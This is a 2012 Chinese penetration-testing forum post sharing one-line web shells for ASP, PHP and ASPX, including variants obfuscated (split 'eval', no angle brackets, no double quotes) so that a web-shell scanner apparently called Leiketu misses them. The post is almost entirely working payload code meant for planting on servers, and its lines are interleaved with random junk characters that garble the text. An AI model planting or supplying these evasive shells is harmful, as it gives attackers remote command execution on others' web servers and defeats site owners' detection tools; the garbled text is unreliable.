中国网络渗透测试联盟

标题: 过雷克图一句话木马 [打印本页]

作者: admin    时间: 2012-9-23 14:36
标题: 过雷克图一句话木马
asp一句话  <%execute(request("1"))%>  0 }) B2 g: K- |% O! K
' m# ?8 t  X% M3 m( ^9 k1 N
php一句话  <?php eval($_POST[1]);?>  # b% ?1 S  Q) f/ ~7 u% W

& V" `: g9 e+ X4 F, Q! p% v. iaspx一句话
  N' e' l0 \( n/ ~: v2 Z* }
7 c" D) N/ @" W1 G' j<script language="C#" runat="server">
2 K4 t' z/ U  H* D' X
1 m7 P; H( \2 ~, ?: ]WebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");
1 H% i# w5 q! I0 x
! y  h' n' w* o$ ^</script># R- e5 v% m, b
5 Q2 t1 O# r- i$ d; y: r/ Y
可以躲过雷客图的一句话。
5 a( b& W- A: [+ F, J7 j  X( Z- x! Y& ?! ~6 Z. x; v( d% p+ X9 _$ H, d
  <%3 J. U6 ?. Z, W+ G# ^
, Y9 j; r" _6 \; X. T; g$ x/ K
  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
8 {! R9 u+ C) j& \
. Z8 M" H5 e7 e( e8 ^) {* i  ms.Language="VBScript"+ I* q9 U+ l4 `  n. O! o" s
0 P! w4 e6 B+ a( \6 M$ i
  ms.AddObject "Response", Response4 o2 f1 I& T; a) k

' G# @2 Z# h/ Y4 R& C! {  ms.AddObject "request", request
' R  r1 k/ P! U3 A4 g- N! b
1 [! m6 _$ }( O7 K3 R- }  ms.ExecuteStatement("ev"&"al(request(""1""))")
% L% T, i1 ~4 a# m% @& F* y- S3 N/ C! p9 C. F
  %>" d' Q" Y5 \2 O0 ?: r! k

, B3 A. w! J8 l6 E. ^  不用'<,>'的asp一句话
5 w, q+ b3 F) {' t7 p$ [1 m
- a$ o4 W3 @% h: l- x% g8 H+ \  <script language=VBScript runat=server>execute request("1")</script>
$ Z  r; F6 g! ]4 H0 i' i
# ]8 G- c! Q! C) D, _  不用双引号的一句话。0 W8 ^* E0 ]& M9 v* `: y2 y% W
) v7 f0 N+ j0 n1 ^
  <%eval request(chr(35))%>
% G; K; ~% e( J" p& n




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2